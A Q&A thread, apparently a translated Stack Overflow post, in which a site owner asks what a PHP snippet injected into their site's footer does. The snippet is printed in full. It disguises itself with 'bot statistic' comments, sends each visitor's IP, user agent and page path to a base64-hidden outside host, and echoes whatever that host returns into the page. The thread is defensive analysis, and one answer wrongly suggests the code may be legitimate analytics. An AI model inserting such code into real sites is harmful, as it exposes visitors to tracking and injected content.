php - 嵌入我网站页面的木马代码。这段代码的含义是什么？

Question

今天打开我的网站时，ESET NOD32 警告我有木马，并阻止了该网站。当我分析代码时，下面的代码在页脚中......这个代码是做什么用的，他（黑客）通过将这个代码插入我的网站可以获得什么优势？

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

Answer 1

对我来说，它看起来像是某种分析代码。它将请求的 URL、远程 IP 地址、浏览器用户代理等详细信息发送到“ http://mbrowserstats.com/statH/stat.php ”。我不熟悉那个特定的网站，但它可能是合法的。有时防病毒软件会错误地报告这些事情。

根据一些搜索，似乎有点 50/50。看起来它并没有造成太大的伤害，但可能会通过黑客传播。我发现了一些关于它的示例页面：

• http://www.wjunction.com/16-webmaster-discussion/166680-site-hacked-here-code-pls-help.html
• http://ninjafirewall.com/malware/index.php?threat=2013-02-22.01
• http://onlinelinkscan.com/results/mbrowserstats-comstatestat-php/
• http://www.statscrop.com/www/mbrowserstats.com

删除它可能是最安全的，并遵循一些防止再次发生的建议。

Answer 2

这看起来不合法。搜索代码中的一个字符串表明其可能的目的是仅在选择的搜索引擎访问时才添加指向您网站的链接。

因此，当您访问网站本身时，它会看起来不错，但它会充满针对搜索引擎的垃圾邮件类型的广告，而搜索引擎又会将您的网站视为支持各种旨在提高其页面排名的链接.

无论如何，如果您没有特别识别代码，请确保您的用户安全并摆脱它。如果你没有安装它，你应该弄清楚代码是如何安装的，这样就不会再发生了。